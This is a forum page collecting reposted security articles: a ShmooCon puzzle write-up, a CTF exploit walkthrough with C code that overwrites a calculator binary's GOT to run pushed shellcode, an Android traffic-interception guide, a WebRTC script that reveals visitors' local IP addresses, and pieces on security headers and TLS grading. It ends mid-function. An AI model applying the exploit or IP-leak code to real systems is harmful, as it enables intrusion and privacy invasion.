Everything posted by Nytro

  1. Shmooganography 2014

Posted on January 24, 2014 by Brian Cardinale

This past weekend I attended ShmooCon 2014, an annual east coast hacking conference where like-minded, and sometimes unlike-minded, people gather to exchange ideas and have a generally good time. The conference provides a forum for various speakers to present their research, and alongside the varied and interesting talks there are also many contests. There are a number of Capture the Flag (CTF) contests involving wireless, binary reversing, trivia, and cryptography, as well as steganography, which is the practice of hiding a message in plain sight. We took a crack at the steganography challenge, and here is an outline of our experience and thought process.

Shmooganography was announced at the opening ceremony and we were told to investigate a huge Star Gate portal at the other end of the con. There we found a large Star Gate portal made out of printed cardboard cutouts and Christmas lights pulsating to the Star Gate theme music, which played on repeat. There was also a bar code scanner with the instruction to scan your registration bar code to determine which of five Star Gate characters you were. Conferences promote social interaction within and outside the community, and this first challenge encouraged exactly that: to obtain the first glyph, five bar codes needed to be scanned that would render the five different Star Gate characters. Doing so yielded the first glyph, which turned out to be Scorpio, and the next clue:

"The dial spins and chevrons are engaged. Getting the order correct yields the next generation"

The next clue led to investigating the four cardboard Shmooganography posters scattered across the Washington Hilton conference area, each featuring an ancient Star Gate with nine chevrons. Each poster had nine chevrons, either fully colored red or partially colored.
The nine chevrons then pointed to 8 boxes on the right-hand side, one chevron being disconnected. The color of the chevrons and their order changed between the posters. During this part of the challenge a hint was released on the Shmooganography site:

"Stage 2: What the chevron on each gate points to doesn't matter as much as whether it is on. Or off. Or connected at all."

On and off was a big hint indicating the chevrons were a binary representation with 8 positions, which can yield the numbers 0-255. This information, coupled with the 4 separate signs, indicated that we had 4 sets of 8 binary digits, which bears a striking resemblance to the description of an IP address. The order of the numbers played a role, but the number of positions didn't limit the ability to guess. Another clue was released to provide the proper order, as no one was making it past this phase in any timely manner. None of the IP addresses we derived were responding to network traffic, or were even in this country, which made the whole decoding process questionable. There was a lot of head scratching at this point. We hit a wall. Then this hint was posted:

"Stage 2: The chevrons are broken. The creator made a mistake. They should decode to 205.134.172.239 (when put in order). Still refer to the previous hints to know what to do with this information."

Please return your chair to the upright and vertical position. OK, so now there is a working IP address, finally. Time to investigate what is listening at the other end. Here is where nmap is your friend! A couple of web ports were open, all of which redirected to ShmooCon 2014 - January 17-19 - Welcome. The last hint said to refer to previous hints:

"Stage 2: Need to echo a change of host… URL – CON + COM – ORG"

This was interpreted as adding an entry to our hosts file for the newly acquired IP address. Using the math provided by the hint, "con" and "org" get removed from "www.shmoocon.org" and "com" gets added, yielding "www.shmoo.com".
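The stage-2 decoding can be sketched in a few lines of Python. The actual chevron patterns are not reproduced in this write-up, so the bit strings below are back-derived from the corrected IP address in the hint; they merely stand in for the four posters.

```python
# Each poster encodes one octet: 8 chevrons read as on/off bits.
# These bit strings are illustrative, back-derived from 205.134.172.239.
posters = ["11001101", "10000110", "10101100", "11101111"]

def chevrons_to_ip(bit_strings):
    """Interpret each 8-chevron poster as one binary octet of an IPv4 address."""
    return ".".join(str(int(bits, 2)) for bits in bit_strings)

print(chevrons_to_ip(posters))  # 205.134.172.239
```

The poster order matters, of course, which is exactly why a hint had to be released with the correct ordering.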
The hosts file was updated to point www.shmoo.com to 205.134.172.239. Now the IP address returned the shmoo.com homepage, but no further clues to the game, so back to the hints:

"Stage 2: Know your glyphs! Start with Earth in the northeast corner. Take it from there. First letter each, upper case. Don't forget Hint #2."

Earth was one of the glyphs on the poster boards that was not connected to a position. The other glyphs not connected to a position on the boards were: Orion, Hydra, Equuleus, Capricornus. The capital first letters spell out ECHO. Time to try www.shmoo.com/ECHO. Bingo! The clue found there was vague. Port knocking was one theory: if we connected to two separate ports, another might appear. At this time we broke off and went to the ShmooCon Reception to cash in on our free drinks. Thanks, Shmoo Group! At the reception we were able to talk to the organizers of the contest, air our, er, frustrations over the IP address, and learn a little about them. They were genuinely cool guys, and this information might come in handy later. So remember, it's important to socialize at cons for all sorts of reasons!

The next morning we went back down to the Star Gate to try to decode the next clue. Another hint was released:

"Stage 3: The black hole casts a hue; but it is sound which activates its data transfer. That Gate music has a nice beat to it."

There were two boxes in the area that had black lights in them, which satisfied the "black hole" and "hue" parts, but how to activate them with sound was not obvious. There was a black device taped inside the box, but no visible serial numbers. We attempted to play the Star Gate theme music into the box to see if the black light would start flashing Morse code, but alas, no luck. Referring back to the SAGITTARIUS clue concerning two gates being connected, we decided to start rhythmically tapping both boxes to see what would happen. After a few moments there was audio coming out of one of the boxes, and squeals coming out of me.
We had activated the portal! The sound that played was an audio clip from the show Star Gate, which read the following:

"Humans and material obviously traverse the wormholes, but the event horizon conveys much more."

Also in the clip was audible noise. A signal! We recorded the message and broke off to some place quiet to start decoding it. Loading the recorded file in Audacity and switching to the spectrogram view made one thing clear: there was data inside this file! The question was how it was encoded. An important lesson in these challenges is to try not to overthink things, but that didn't stop us from diving deep into the rabbit hole of signal encoding. There were 27 positions of data, which is odd; computer signals don't usually come in uneven counts. The frequency of the signals also did not correlate to DTMF tones, which was an early theory we held. We were stumped. Then another clue was released:

"Stage 3: Don't be hexed by pieces of eight."

Easy for you to say, game maker! At this point the conference closing ceremony was coming upon us, as well as the end of the time frame allowed for the challenge, and we had yet to decode the data. It was actually a good clue, we realized later at the closing ceremonies. I believe the signal was a representation of octal, if I recall correctly. It's a little fuzzy, as we were drinking our woes away for being beaten by an eleven-year-old! We may have worked against ourselves and pointed him in the direction of the portals with the audio signal, because that's what this experience was all about: learning something new and helping others learn it too! Congrats, kid! We'll get you next year!

Source: Shmooganography 2014 | Cardinale Concepts
  2. Ghost in the Shellcode: TI-1337 (Pwnable 100)

Hey everybody,

This past weekend was Shmoocon, and you know what that means: Ghost in the Shellcode! Most years I go to Shmoocon, but this year I couldn't attend, so I did the next best thing: competed in Ghost in the Shellcode! This year, our rag-tag band of misfits (that is, the team who purposely decided not to ever decide on a team name, mainly to avoid getting competitive) managed to get 20th place out of at least 300 scoring teams! I personally solved three levels: TI-1337, gitsmsg, and fuzzy. This is the first of three writeups, for the easiest of the three: TI-1337, solved by 44 teams. You can download the binary, as well as the exploit, the IDA Pro files, and everything else worth keeping that I generated, from my Github repository.

Getting started

Unlike some of my teammates, I like to dive head-first into assembly and try not to drown. So I fired up IDA Pro to see what was going on, and I immediately noticed that it's a 64-bit Linux binary without a ton of code. Having never in my life written a 64-bit exploit, this would be an adventure!

Small aside: Fork this!

I'd like to take a quick moment to show you a trick I use to solve just about every Pwn-style CTF level: getting past that pesky fork(). Have you ever been trying to debug a vuln in a forking program? You attach a debugger, it forks, it crashes, and you never see why. So you go back, you set affinity to 'child', you debug, the debugger follows the child, catches the crash, and the socket doesn't get cleaned up properly? It's awful! There is probably a much better way to do this, but this is what I do.
First, I load the binary into IDA and look for the fork() call:

.text:00400F65 good_connection:             ; CODE XREF: do_connection_stuff+39j
.text:00400F65 E8 06 FD FF FF    call _fork
.text:00400F6A 89 45 F4          mov [rbp+child_pid], eax
.text:00400F6D 83 7D F4 FF       cmp [rbp+child_pid], 0FFFFFFFFh
.text:00400F71 75 02             jnz short fork_successful

You'll note that opcode bytes are turned on, so I can see the hex-encoded machine code along with each instruction. The call to fork() has the corresponding code e8 06 fd ff ff. That's what I want to get rid of. So I open the binary in a hex editor, such as 'xvi32.exe', search for that sequence of bytes (and perhaps some surrounding bytes, if it's ambiguous), and replace it with 31 c0 90 90 90. The first two bytes, 31 c0, are "xor eax, eax" (i.e., clear eax), and 90 90 90 is "nop / nop / nop". So basically, the call does nothing and eax holds 0 (i.e., the process behaves as if it's the child). You may want to kill the call to alarm() as well, which will kill the process if you spend more than 30 seconds looking at it. You can replace that call with 90 90 90 90 90; it doesn't matter what it returns. I did this on all three levels, and I renamed the new executable "<name>-fixed". You'll find them in the Github repository. I'm not going to go over this again in the next two posts; I'll be referring back to this instead.

The program

Since this is a post on exploitation, not reverse engineering, I'm not going to go super in-depth into the code. Instead, I'll describe it at a higher level and let you delve in more deeply if you're interested. The main handle_connection() function can be found at offset 0x00401567. It immediately jumps to the bottom, which is a common optimization for a 'for' or 'while' loop, where it calls the code responsible for receiving data: the function at 0x00401395.
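The byte patch described above is simple enough to script instead of doing by hand in a hex editor. A minimal sketch (the file names are hypothetical; the byte sequences are the ones from the listing):

```python
# Replace "call _fork" (e8 06 fd ff ff) with "xor eax, eax; nop; nop; nop"
# (31 c0 90 90 90) so the call site behaves as if fork() returned 0.
CALL_FORK = bytes.fromhex("e806fdffff")
PATCH     = bytes.fromhex("31c0909090")

def patch_fork(blob):
    # Same length, so no offsets in the binary shift.
    assert len(CALL_FORK) == len(PATCH)
    return blob.replace(CALL_FORK, PATCH)

# Usage (hypothetical file names):
# with open("ti-1337", "rb") as f:
#     open("ti-1337-fixed", "wb").write(patch_fork(f.read()))
```

In a real binary you would want to anchor on some surrounding bytes too, as the post notes, since e8 06 fd ff ff is a relative call and could appear more than once.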
After receiving data, it jumps back to the top of the handle_connection() function, just after the jump to the bottom, where it goes through a big if/else list looking for a bunch of symbols (like '+', '-', '/' and '*'; look familiar?). After the if/else list, it goes back to the receive function, then to the top of the loop, and so on. Receive, parse, receive, parse, etc. Let's look at those two pieces separately, then we'll explore the vulnerability and see the exploit.

Receive

As I mentioned above, the receive function starts at 0x00401395. This function starts by reading up to 0x100 (256) bytes from the socket, ending at a newline (0x0a) if it finds one. This is done using a simple receive-loop function located at 0x0040130E that is worth going through if you're new to this, but it doesn't add much to the exploit. After reading the input, it's passed to sscanf(buffer, "%lg", ...). The format string "%lg" tells sscanf() to parse the input as a "double" variable, a 64-bit floating point. Great: an x64 process handling floating point values; that's two things I don't know! If the sscanf() fails, that is, if the received data isn't a valid-looking floating point value, the received data is copied wholesale into the buffer. A flag at the start of the buffer is set indicating whether or not the double was parsed. Then the function returns. Quite simple!

Processing the data

I mentioned earlier that this binary looks for mathematical symbols ('+', '-', '*', '/') in the received data. I didn't actually notice that right away, nor did the name "TI-1337" (or the fact that it used port "31415"... think about it) lead me to believe this might be a calculator. I'm not the sharpest pencil sometimes, but I try hard! Anyway, back to the main parsing code (near the top of the function at 0x00401567 again)!
The parsing code is actually divided into two parts: a short piece of code that runs if a valid double was received (i.e., the sscanf() worked), and a longer one that runs if it wasn't a double. The short piece of code simply calls a function (spoiler alert: the function pushes the value onto a global stack object they use, not to be confused with the runtime stack). The longer one performs a bunch of string comparisons and does something based on those.

I think at this point I'll give away the trick: the whole application is a stack-based calculator. It allocates a large chunk of memory as a global variable and implements a stack (a length followed by a series of 64-bit values). If you enter a double, it's pushed onto the stack and the length is incremented. If you enter one of a few symbols, it pops one or more values (without checking if we're at the beginning!), updates the length, and performs the calculation. The new value is then pushed back on top of the stack. Here's an example session:

(sent) 10
(sent) 20
(sent) +
(sent) .
(received) 30

And a list of all possible symbols:

+ :: pops the top two elements off the stack, adds them, pushes the result
- :: same as '+', except it subtracts
* :: likewise, multiplication
/ :: and, to round it out, division
^ :: exponents
! :: I never really figured this one out; might be a bitwise negation (or might not, it uses some heavy floating point opcodes that I didn't research)
. :: display the current value
b :: display the current value, and pop it
q :: quit the program
c :: clear the stack

And, quite honestly, that's about it! That's how it works; let's see how to break it!

The vulnerability

As I alluded to earlier, the program fails to check where on the stack it currently is when it pops a value. That means if you pop a value when there's nothing on the stack, you wind up with a buffer underflow. Oops! That means that if we pop a bunch of times then push, it's going to overwrite something before the beginning of the stack.
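The calculator's logic, and its missing bounds check, can be modeled with a short sketch. This is an illustration of the bug, not the binary's actual code; note that Python's negative indexing merely wraps around, where the real program would walk backwards in memory toward the GOT.

```python
class CalcStack:
    """Toy model of the binary's global stack: a length plus a value array."""
    def __init__(self, size=16):
        self.length = 0
        self.slots = [0.0] * size

    def push(self, v):
        self.slots[self.length] = v   # with length < 0 this writes out of bounds
        self.length += 1

    def pop(self):
        self.length -= 1              # no lower-bound check: the vulnerability
        return self.slots[self.length]

calc = CalcStack()
calc.push(10.0)
calc.push(20.0)
calc.push(calc.pop() + calc.pop())    # the '+' handler
print(calc.pop())                     # 30.0

underflow = CalcStack()
underflow.pop()                       # nothing on the stack; length goes to -1
underflow.push(99.0)                  # writes *before* the stack's start
```

In the real binary, "before the stack's start" is exactly where the GOT entries live, which is what makes the underflow exploitable.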
So where is the stack? If you look at the code in IDA, you'll find that the stack starts at 0x00603140, in the .bss section. If you scroll up, before long you'll find this:

.got.plt:00603018 off_603018 dq offset free       ; DATA XREF: _freer
.got.plt:00603020 off_603020 dq offset recv       ; DATA XREF: _recvr
.got.plt:00603028 off_603028 dq offset strncpy    ; DATA XREF: _strncpyr
.got.plt:00603030 off_603030 dq offset setsockopt ; DATA XREF: _setsockoptr
...

The global offset table! And it's readable/writeable! If we pop a couple dozen times, then push a value of our choice, we can overwrite any entry, or all entries, with any value we want! That just leaves one last step: where to put the shellcode?

Aside: floating point

One gotcha that's probably uninteresting, but is also the reason this level took me significantly longer than it should have: the only thing you can push/pop on the application's stack is 64-bit double values! They're read using "%lg", but when I printed stuff out using printf("%lg", address), it would truncate the numbers! Boo! After some googling, I discovered that you have to raise printf's precision a whole bunch to reproduce the full 64-bit value as a decimal number. I decided that 127 decimal places was more than enough (probably like 5x too much, but I don't even care) to get a good result, so I used this to convert a series of 8 bytes to a unique double:

sprintf(buf, "%.127lg\n", d);

I incorporated that into my push() function:

/* This pushes an 8-byte value onto the server's stack. */
void do_push(int s, char *value) {
  char buf[1024];
  double d;

  /* Convert the value to a double */
  memcpy(&d, value, 8);

  /* Turn the double into a string */
  sprintf(buf, "%.127lg\n", d);
  printf("Pushing %s", buf);

  /* Send it */
  if(send(s, buf, strlen(buf), 0) != strlen(buf))
    perror("send error!");
}

And it worked perfectly!

The exploit

Well, we have a stack (once again, not to be confused with the program's stack) where we can put shellcode.
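For comparison, the same encoding trick is easy to reproduce in Python with the struct module: reinterpret any 8 bytes as a double, print it with generous precision, and the server's sscanf("%lg") recovers the original bit pattern. The round-trip helper below models that server side; the address is the .bss stack address from the write-up.

```python
import struct

def encode_qword(raw):
    """Turn 8 raw bytes into the decimal string the calculator will parse."""
    (d,) = struct.unpack("<d", raw)   # bytes -> little-endian IEEE-754 double
    return "%.127g\n" % d             # same precision trick as do_push()

def server_side(text):
    """What sscanf(buffer, '%lg', ...) reconstructs on the other end."""
    return struct.pack("<d", float(text))

addr = struct.pack("<Q", 0x00603140)  # the global stack's address
assert server_side(encode_qword(addr)) == addr
```

One caveat: byte patterns that decode to NaN can lose payload bits when round-tripped through text; the author reports the 127-digit trick worked fine for his shellcode in practice.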
It has a static memory address and is user-controllable. We also have a way to encode the shellcode (and addresses) so we wind up with fully controlled values on the stack. Let's write an exploit! Here's the bulk of it:

int main(int argc, const char *argv[])
{
  char buf[1024];
  int i;
  int s = get_socket();

  /* Load the shellcode */
  for(i = 0; i < strlen(shellcode); i += 8)
    do_push(s, shellcode + i);

  /* Pop the shellcode (in retrospect, this could be replaced with a single 'c') */
  for(i = 0; i < strlen(shellcode); i += 8)
    do_pop(s);

  /* Pop until we're at the recv() call */
  for(i = 0; i < 38; i++)
    do_pop(s);

  do_push(s, TARGET);

  /* Send a '.' just so I can catch it */
  sprintf(buf, ".\n");
  send(s, buf, strlen(buf), 0);

  sleep(100);

  return 0;
}

You can find the full exploit here!

Conclusion

And that's all there is to it! Just push the shellcode on the stack, pop our way back to the .got.plt section, and push the address of the stack. Bam! Execution! That's all for now; stay tuned for the much more difficult levels: gitsmsg and fuzzy!

January 24, 2014
Ron Bowes

Source: https://blog.skullsecurity.org/2014/ghost-in-the-shellcode-ti-1337-pwnable-100
  3. Android Assessments with GenyMotion + Burp

As much as I love Android app assessments, I kept coming across the same problem: do I waste time trying to 'root' an Android device, or deal with the incredibly buggy, slow, unresponsive, and overly difficult Android emulator that comes with the Android SDK bundle? Then I was introduced to Genymotion: an Android emulator based on the AndroVM Open Source project (AndroVM blog | Running Android in a Virtual Machine). Genymotion utilizes VirtualBox to run an Android OS within a virtual machine. This results in a drastic increase in speed, response, stability, and ease of use. I've been working with Genymotion for a little while now and wanted to compile a bunch of things I've learned how to do, in order to make it easier for others to have a consolidated resource:

  • Downloading and installing Genymotion
  • Standing up a new Android OS VM
  • Useful features within Genymotion (drag & drop, etc.)
  • Using ADB with Genymotion to install applications
  • Configuring the Android VM to pass all web traffic through Burp
  • Using ADB with Genymotion to install a Burp SSL certificate
  • Troubleshooting the ARM error and adding Google Play support within Genymotion

Upon installation you are prompted to provide the same credentials that were created to log in and download Genymotion. This will let you connect to the Genymotion cloud and download a pre-built Android VM. My Android testing environment consists of a MacBook Pro, although all of the tools/techniques used in this post are platform independent. I am also going to use Burp Suite Pro and Free 1.5, which is also platform independent. Lastly, while I talk about utilizing the Android SDK/ADT/ADB and installing APK applications, I do not cover how to set up your Android SDK/ADT/ADB or find APK applications outside of Google Play.

Downloading and Installing Genymotion:

Genymotion requires the use of VirtualBox.
The Windows 32/64-bit download of Genymotion comes with VirtualBox; however, the OS X and Linux versions do not, so it must be installed separately. The link can be found here. VirtualBox must be installed before Genymotion. In order to download Genymotion, a free sign-up is required. Once the email address on the account has been verified, a link to download Genymotion can be accessed. The link to sign up and download Genymotion can be found here.

Standing up a new Android OS VM:

Select 'Galaxy Nexus - 4.3 - API 18 - 720x1280' and click 'Next'. The VM will automatically be downloaded from the Genymotion cloud. Once the download is complete and the VM has been successfully installed within VirtualBox, it should be listed under 'Your Virtual Devices'. Click the 'Play' button to run the VM for the first time. If everything is successful the VM should be running.

Useful Features within Genymotion:

This feature list is not all-inclusive; however, I wanted to point out a few features I found useful when setting up my environment. In addition, I want to point out that for developers, Genymotion has an IntelliJ IDEA plugin as well as an Eclipse plugin to push the app you are developing directly to your Android VM through ADB. By clicking on the 'Settings' icon, the Genymotion settings menu will appear. Under the 'Network' tab are proxy settings for Genymotion to be able to reach out to its cloud service and download new VMs and updates. NOTE: This setting is NOT for configuring the Android VM to send web traffic through a proxy. That will be covered in a later section. Under the 'ADB' tab you can point Genymotion to the SDK directory within your Android development environment. Within the Android VM, Genymotion installs a configuration application that allows for some environment modifications.
Since the VM is already 'rooted', there are not a lot of configuration settings that need to be modified on this screen; however, it is useful to enable the physical keyboard for input. If any settings are modified within this application, the VM will require a reboot. The last and most useful feature within Genymotion is drag and drop. This feature can be used to transfer files and install applications in the Android VM environment. Simply drag a file from the host's desktop or a folder directly into the Android VM. Once the file transfer is complete, the Android OS will notify the user where the file is located within the OS (by default it is '/sdcard/Download').

Using ADB to Install Applications:

ADB can be used to push and pull files as well as install Android applications. However, as mentioned in the section above, the ADB environment path must be properly specified within Genymotion. Using ADB commands, verify that a device is listed. Then, using the syntax ./adb install <path/to/.apk_file>, install the Android application. If the installation is successful, ADB will print 'Success' upon completion. The newly installed application should now be available for use within the Android VM. However, an easier way of installing Android applications into the Android VM is to simply utilize Genymotion's drag and drop feature: drag and drop an APK file into the VM and the application should install successfully and be ready for use within the VM environment.

Configure the Android VM Proxy and Burp:

For performing security assessments, as well as validating an application in development, it is necessary to view the web traffic passed back and forth between the client (the Android application installed on an end device) and its corresponding server. It is possible to configure the Android VM within Genymotion to pass all of its web traffic through a web proxy such as Burp. Verify the current IP address of the host machine.
In the instance above, the IP address of the host machine is 192.168.1.11. We will later set the proxy within the Android VM to this IP address. Within the Android VM, go to 'Settings' and click on 'Wi-Fi'. Click and hold 'WiredSSID' until a box pops up, then click on 'Modify network'. Check the 'Show advanced options' box and select 'Manual' from the Proxy Settings menu. Specify the host IP address and set a default port for the proxy to listen on. In this case my host IP was 192.168.1.11 and the listening port was 8080. When those changes have been made, click 'Save' and exit out of Settings. At this point the Android VM should be completely configured to pass web traffic to the web proxy. However, the web proxy must be configured to listen on the host IP we specified within the Android VM. For the purposes of this blog I chose to use Burp Suite, as it is one of the most common and widely used web proxies around. Launch Burp Suite Pro or Free. Click on the top 'Proxy' tab, then click on the 'Options' secondary tab. Lastly, click on the 'Add' button to add a new proxy listener. Specify the listener port that we defined within the Android VM (in our case, port 8080). Also, click on the 'Specific address' radio button and, from the drop-down, select the IP address specified within the Android VM (in our case, 192.168.1.11). When complete, click 'OK' to return to the previous screen. Verify that the new proxy listener has been added and that the check box next to the listener is checked, to ensure it is enabled. If all of the settings were configured properly, Burp should now be seeing web traffic passed to it by the Android VM. If traffic is still not being passed, the IP address of the host should be verified, as the DHCP lease may have run out and the IP address may have changed.

Installing the SSL Certificate with ADB:

Until this point, all web traffic should be passing from the Android VM to Burp.
However, if any applications are communicating over HTTPS, you will receive a 'Webpage not Available' error. This happens because the Burp Certificate Authority (CA) certificate is not yet trusted by the Android VM. There are two methods of retrieving the Burp CA certificate in order to install it on the Android VM.

If you have the free version of Burp: Open up Burp and enable the loopback (127.0.0.1) listener on port 8080 if it is not already enabled. Open up Firefox on your host machine. Go to Firefox's Preferences and, under the 'Advanced' tab in the 'Connection' section, click on 'Settings'. Click on the 'Manual proxy configuration' radio button. Specify the loopback address (127.0.0.1) and port 8080 as the listening port. Click 'OK' and exit out of the Preferences. Go to any HTTPS-based website; for this example I chose https://google.com. You will receive a Connection Untrusted message. Click on the 'Add Exception' button at the bottom, then the 'View' button to view the identity of the certificate. Click on the 'Details' tab and notice that the certificate references PortSwigger CA, which is the CA for Burp. Click 'Export' to export the certificate. Change the format to 'X.509 Certificate (DER)' and name the certificate <name>.cer. Save the certificate to an easily accessible location.

If you have the Professional version of Burp: Click on the 'Proxy' tab and the 'Options' secondary tab. Click on the 'CA certificate' button. Export as 'Certificate in DER format'. Click 'Next'. Name the certificate <name>.cer and save it in an easily accessible location.

Next we will get the certificate onto the Android VM and install it. There are two methods of doing so. The first is by using ADB: we use the 'adb push' command to push the certificate into the '/mnt/sdcard' directory of the Android VM. The syntax is: adb push <local/path/to/certificate> </mnt/sdcard/>.
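Concretely, the ADB steps look like this (the certificate file name and local path are examples, not from the original post):

```shell
# Confirm the Genymotion VM is visible to ADB
adb devices

# Push the exported Burp CA certificate onto the VM's SD card
adb push ~/certs/burp.cer /mnt/sdcard/

# Optionally confirm it arrived
adb shell ls /mnt/sdcard/
```

These commands assume a single connected device; with more than one, add -s <serial> to target the VM.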
We can also verify that the certificate has been transferred successfully by entering a shell on the Android VM with the 'adb shell' command and listing the contents of the /mnt/sdcard/ directory. The second method of getting the certificate onto the Android VM is to use the drag and drop feature: drag and drop the certificate file into the Android VM and the file should copy over into the /mnt/sdcard/ directory.

Now that the certificate is on the Android VM, we can install it. In your Android VM, go to 'Settings', click on 'Security', then click on 'Install from SD card'. A box will pop up with the certificate information; verify it and then click 'OK'. Android requires you to set a password in order to use credential storage; click 'OK'. This password can be pattern-based, a PIN, or a password. Select one and set it. The PortSwigger CA certificate should now be installed on your Android VM. To verify that the CA certificate was successfully installed, click on 'Trusted credentials', then the 'User' tab. The PortSwigger CA certificate should be listed there, signifying it was successfully installed. You should now be able to view HTTPS traffic in plain text.

Troubleshooting the ARM error and adding Google Play support within Genymotion:

Support for ARM applications and Google Play was removed from Genymotion starting with the 2.0 release. However, since a decent number of applications require ARM translation, this can be a major pain. When attempting to install an ARM-based application, you will see an ARM translation error. The guys over at XDA-Developers have found a way to recover the functionality of both ARM-based applications and Google Play. The entire thread and download files can be found here. Simply download the ARM Translation Install zip file and the Google Play application zip file (depending on which version of Android you are running within your VM).
Drag and drop each file into your Android VM, and that should do it. We hope this information is useful and eases some of the pain of Android application assessments. We'd love to hear your thoughts.

Posted by Abdullah Munawar

Source: nVisium: Android Assessments with GenyMotion + Burp
  4. Get NAT IP

<body>
Your network IP is: <h1 id=list>-</h1>
source: <a href="http://net.ipcalf.com/">Make the locals proud.</a>
<script>
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;

if (RTCPeerConnection) (function () {
    var rtc = new RTCPeerConnection({iceServers:[]});
    if (window.mozRTCPeerConnection) {      // FF needs a channel/stream to proceed
        rtc.createDataChannel('', {reliable:false});
    };

    rtc.onicecandidate = function (evt) {
        if (evt.candidate) grepSDP(evt.candidate.candidate);
    };
    rtc.createOffer(function (offerDesc) {
        grepSDP(offerDesc.sdp);
        rtc.setLocalDescription(offerDesc);
    }, function (e) { console.warn("offer failed", e); });

    var addrs = Object.create(null);
    addrs["0.0.0.0"] = false;
    function updateDisplay(newAddr) {
        if (newAddr in addrs) return;
        else addrs[newAddr] = true;
        var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
        document.getElementById('list').textContent = displayAddrs.join(" or perhaps ") || "n/a";
    }

    function grepSDP(sdp) {
        var hosts = [];
        sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
            if (~line.indexOf("a=candidate")) {     // http://tools.ietf.org/html/rfc4566#section-5.13
                var parts = line.split(' '),        // http://tools.ietf.org/html/rfc5245#section-15.1
                    addr = parts[4],
                    type = parts[7];
                if (type === 'host') updateDisplay(addr);
            } else if (~line.indexOf("c=")) {       // http://tools.ietf.org/html/rfc4566#section-5.7
                var parts = line.split(' '),
                    addr = parts[2];
                updateDisplay(addr);
            }
        });
    }
})();
else {
    document.getElementById('list').innerHTML = "<code>ifconfig | grep inet | grep -v inet6 | cut -d\" \" -f2 | tail -n1</code>";
    document.getElementById('list').nextSibling.textContent = "In Chrome and Firefox your IP should display automatically, by the power of WebRTCskull.";
}
</script>
</body>

Source: Edit fiddle - JSFiddle (+Demo)
5. 4 HTTP Security headers you should always be using

23-01-2014, Boy Baukema

What started as a dream for a worldwide library of sorts has transformed into not only a global repository of knowledge but also the most popular and widely deployed application platform: the World Wide Web. The poster child for Agile, it was not developed as a whole by a single entity, but rather grew as servers and clients expanded its capabilities. Standards grew along with them. While growing a solution works very well for discovering what works and what doesn't, it hardly leads to a consistent, easy-to-apply programming model. This is especially true for security: where ideally the simplest thing that works would also be the most secure, it is far too easy to introduce vulnerabilities like XSS, CSRF or Clickjacking. Because HTTP is an extensible protocol, browsers have pioneered some useful headers to prevent or increase the difficulty of exploiting these vulnerabilities. Knowing what they are and when to apply them can help you increase the security of your system.

1. Content-Security-Policy

What's so good about it? How would you like to be largely invulnerable to XSS? No matter if someone managed to trick your server into writing <script>alert(1);</script>, have the browser straight up refuse it? That's the promise of Content-Security-Policy. Adding the Content-Security-Policy header with the appropriate value allows you to restrict the origin of the following:

script-src: JavaScript code (the biggest reason to use this header)
connect-src: XMLHttpRequest, WebSockets, and EventSource
font-src: fonts
frame-src: frame URLs
img-src: images
media-src: audio & video
object-src: Flash (and other plugins)
style-src: CSS

So specifying the following:

Content-Security-Policy: script-src 'self' https://apis.google.com

means that script files may only come from the current domain or from apis.google.com (the Google JavaScript CDN).
Another helpful feature is that you can automatically enable sandbox mode for all iframes on your site. And if you want to test the waters first, you can use the Content-Security-Policy-Report-Only header to do a dry run of your policy and have the browser post the results to a URL of your choosing. It is definitely worth the time to read the excellent HTML5Rocks introduction. Articol complet: http://ibuildings.nl/blog/2013/03/4-http-security-headers-you-should-always-be-using
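The header described above is just a response header, so any server can emit it. Below is a minimal sketch (my own, not from the article) using only Python's standard library; the policy dictionary and the `build_csp` helper are illustrative names, and the policy value mirrors the article's `script-src 'self' https://apis.google.com` example, with the report-only variant selected by a flag:

```python
from http.server import BaseHTTPRequestHandler

def build_csp(policy=None, report_only=False):
    """Build a (header-name, header-value) pair for a CSP policy."""
    if policy is None:
        # Scripts only from our own origin and the Google JS CDN,
        # matching the article's example.
        policy = {"script-src": "'self' https://apis.google.com"}
    name = ("Content-Security-Policy-Report-Only" if report_only
            else "Content-Security-Policy")
    # Directives are joined with "; ", e.g. "img-src *; script-src 'self'"
    value = "; ".join("%s %s" % (d, src) for d, src in sorted(policy.items()))
    return name, value

class CSPHandler(BaseHTTPRequestHandler):
    """Toy handler that attaches the CSP header to every response."""
    def do_GET(self):
        self.send_response(200)
        name, value = build_csp()
        self.send_header(name, value)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<h1>hello</h1>")
```

Serving `CSPHandler` with `http.server.HTTPServer` would deliver the policy on every page; switching `report_only=True` gives the dry-run behaviour mentioned above.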
6. SSL Labs: Stricter security requirements for 2014

January 21, 2014

Today, we're releasing a new version of the SSL Rating Guide as well as a new version of SSL Test to go with it. Because the SSL/TLS and PKI ecosystem continues to move at a fast pace, we have to periodically evaluate our rating criteria to keep up. We have made the following changes:

Support for TLS 1.2 is now required to get an A. If this protocol version is not supported, the grade is capped at B. Given that, according to SSL Pulse, TLS 1.2 is supported by only about 20% of servers, we expect this change to affect a large number of assessments.

Keys below 2048 bits are now considered weak, with the grade capped at B. Keys below 1024 bits are now considered insecure, and given an F.

MD5 certificate signatures are now considered insecure, and given an F.

We introduce two new grades, A+ and A-, to allow for finer grading. This change allows us to reduce the grade slightly when we don't want to reduce it to a B, but we still want to show a difference. More interestingly, we can now reward exceptional configurations. We also introduce a concept of warnings; a server with good configuration, but with one or more warnings, is given a reduced grade of A-.

Servers that do not support Forward Secrecy with our reference browsers are given a warning.

Servers that do not support secure renegotiation are given a warning.

Servers that use RC4 with TLS 1.1 or TLS 1.2 protocols are given a warning. This approach allows those who are still concerned about BEAST to use RC4 with TLS 1.0 and earlier protocols (supported by older clients), but we want them to use better ciphers with protocols that are not vulnerable to BEAST. Almost all modern clients now support TLS 1.2.

Servers with good configuration, no warnings, and good support for HTTP Strict Transport Security (a long max-age is required) are given an A+.
I am very happy that our rating approach now takes into account some very important features, such as TLS 1.2, Forward Secrecy, and HSTS. Frankly, these changes have been overdue. We originally meant to have all of the above in a major update to the rating guide, but we ran out of time, and decided to implement many of the ideas in a patch release. Sursa: Ivan Ristić: SSL Labs: Stricter security requirements for 2014
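The capping rules above read naturally as a small decision procedure. Here is a rough sketch of them (my own simplification for illustration, not SSL Labs' actual grading algorithm, which weighs many more factors):

```python
def grade(base, tls12, min_key_bits, md5_signature, warnings, hsts_long_maxage):
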